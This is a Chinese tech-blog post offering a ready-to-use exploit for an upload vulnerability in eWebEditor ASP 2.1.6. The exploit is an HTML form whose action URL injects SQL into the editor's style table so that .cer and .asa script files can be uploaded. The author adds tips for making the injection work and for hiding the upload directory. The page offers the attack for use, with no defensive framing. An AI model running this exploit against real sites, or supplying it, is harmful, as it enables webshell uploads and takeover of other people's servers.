ewebeditor上传漏洞 - ice - ITeye博客

`

wcf1987

浏览: 631094 次
性别:
来自: 西安

最近访客更多访客>>

guojch

XiaoPY

cloaking

gaoaohan

博主相关

博客

微博

相册

收藏

留言

关于我

文章分类

社区版块

存档分类

最新评论

d1438138： [img][/img]
google api 的一些神奇使用
waykingeye： [i][b][u]引用[list] [*][img][url] ...
No result defined for action and result input
tss0823： ...
No result defined for action and result input
yahier：有什么办法能够捕捉，然后给出自定义的提示呢
No result defined for action and result input
chen_lian：恩恩按照上面的代码测试一下觉得很对
java创建目录

ewebeditor上传漏洞

博客分类：

hacker

阅读更多

<H3>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H3><br><br>
<form action="http://xxxx/include/wedit/upload.asp?action=save&type=IMAGE&style=standard' and 1=2 union select S_ID,S_Name,S_Dir,S_CSS,'UploadFile',S_Width,S_Height,S_Memo,S_IsSys,[S_FileExt]%2b'|cer' ,S_FlashExt,[S_ImageExt]%2b'|asa',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>

这是别人写的，我改了下，其中标红的时要注意的。

第一个地方最好加上1=2，不然实际应用中有可能union的不会被加上

第二个地方是可以自自定义上传路径的，但是一定要是存在的，可以考虑

写道

Admin
ButtonImage
CSS
db
Dialog
Example
Include
SysImage

这样可以有一定的隐蔽性，别的就没什么了

分享到：

windows远程超最大连接数 | 一个自定义扫描web程序源代码的工具

2011-10-10 17:32
浏览 2923
评论(0)
分类:Web前端
查看更多

评论

发表评论

您还没有登录,请您登录后再发表评论

相关推荐

eWebEditor 2.1.6 asp版上传漏洞利用程序: eWebEditor 2.1.6 asp版上传漏洞利用程序 eWebEditor 2.1.6 asp版上传漏洞利用程序 eWebEditor 2.1.6 asp版上传漏洞利用程序

ewebeditor漏洞与防范专题资源: 3. **文件上传漏洞**：EwebEditor允许用户上传图片和其他文件，如果服务器端验证不严，攻击者可能上传恶意文件，如病毒、木马，或者利用此漏洞执行远程命令。 4. **权限控制漏洞**：EwebEditor可能会出现权限控制...

太子黑盟最新ewebeditor asp版上传漏洞利用工具.rar: 太子黑盟最新ewebeditor asp版上传漏洞利用工具.rar

ewebeditor asp版 2.1.6 上传漏洞利用程序.htm: ewebeditor asp版 2.1.6 上传漏洞利用程序.htm

eWebEditor7-修复漏洞带上传: 　文件 I.JS// eWebEditor 7.0 设置文件　文件 upload.asp//上传文件，不提供上传，就把文件名修改其它名或者删除　文件 upfileclass.asp//上传文件　文件 browse.asp//浏览上传文件目录 sharefile 　目录 ...

30.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御（三）1: 文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御（三）1 本文是作者的网络安全自学教程系列的一部分，主要关注的是如何理解和防范网络安全中的某些常见漏洞。作者强调反对利用这些知识进行非法活动，鼓励读者以保护...

多种上传漏洞及常见系统的利用方法整理: ### 一、上传漏洞概述上传漏洞是Web应用中常见的安全问题之一，它允许攻击者通过上传恶意文件（如包含后门的脚本）来控制服务器或窃取敏感数据。在ASP环境下，由于其广泛的应用和相对较低的安全设置，上传漏洞尤为...

eWebEditor ASP.NET版: 2. **图像处理**：用户可以直接在编辑器中上传图片，进行裁剪、缩放和添加边框等操作，同时支持URL引用外部图片。 3. **链接管理**：提供插入超链接、电子邮件链接的功能，还可以设置锚点和书签。 4. **表格编辑**：...

ewebeditor 编辑器扩展flv 功能: 同时，考虑对上传的文件进行大小限制和文件名重命名，以防止文件覆盖和安全漏洞。此外，为了提升用户体验，可以考虑添加预览功能，让用户在上传后能预览视频，确认无误后再插入到编辑器中。通过以上步骤，...

eWebeditor JSP 王志峰修改版: ·Tomcat环境下，修订图片、flash、多媒体以及附件上传后路径问题；部署方式： 1、把文件夹下除WEB-INF文件夹的全部文件复制到您的网站根目录下； 2、把WEB-INF文件夹下的style.xml和button.xml复制到网站根目录...

eWebEditor编辑器构造上传.pdf: eWebEditor是一款常用的网页富文本编辑器，它允许用户在网页上进行文字编辑、图片上传等功能，但在某些配置不当的情况下，可能会导致上传漏洞，使攻击者有机会上传恶意文件到服务器。首先，我们要理解上传漏洞是...

[原创]eWebEditor8.8js版+asp.net上传浏览文件: eWebEditor8.8js版不带管理后台，更安全；eWebEditor5.CAB插件未加破解，即在线截图、服务器端读取word、excel不能用，其它功能本地与服务器端都能用。请按里面的说明修改文件保存路径。

利用eWebEditor获得WebShell: - 漏洞存在于eWebEditor的文件上传功能，只过滤了`ASP`扩展名，忽略了其他可能的脚本文件，如`ASA`、`CER`等。 - 攻击者利用此漏洞，可以绕过安全防护，上传并执行恶意脚本，从而获取WebShell。请注意，这些操作...

eWebEditor V10.0 for JSP 多语言商业版: 及时升级到最新版本可以确保享受到最新的功能和修复的安全漏洞。 6. **易用性**：eWebEditor以其直观的用户界面和易于配置的特性而受到赞誉。即使是对编程不太熟悉的用户，也能通过简单的设置快速上手。 7. **...

eWebEditor JSP版: 同时，为了防止文件上传漏洞，开发者应确保服务器端代码能有效验证文件类型、大小，甚至进行文件重命名以避免路径遍历攻击。为了适应不同的项目需求，eWebEditor还支持定制化。开发者可以通过修改CSS样式来自定义...

ewebeditor批量检测工具: 然而，如同所有软件一样，EWebEditor可能存在一些默认设置或漏洞，这些可能被不法分子利用，对网站的安全构成威胁。为了解决这个问题，"ewebeditor批量检测工具"应运而生。该工具的主要功能是对EWebEditor的后台...

eWebEditor7.3官方原版修改版: 3. **插入图像**：用户可以直接在编辑器中上传图片，并能调整图片尺寸、添加边框和水印，以及设置对齐方式。 4. **链接管理**：支持添加、编辑和删除超链接，方便构建网页导航。 5. **表格处理**：能够创建、编辑...

网页编辑器漏洞大全: Cuteditor、Freetextbox、Webhtmleditor和Kindeditor等其他编辑器也各有其安全问题，比如Cuteditor可能存在的上传漏洞，Freetextbox的权限控制不足，Webhtmleditor的XSS跨站脚本漏洞，以及Kindeditor的文件操作漏洞...

Global site tag (gtag.js) - Google Analytics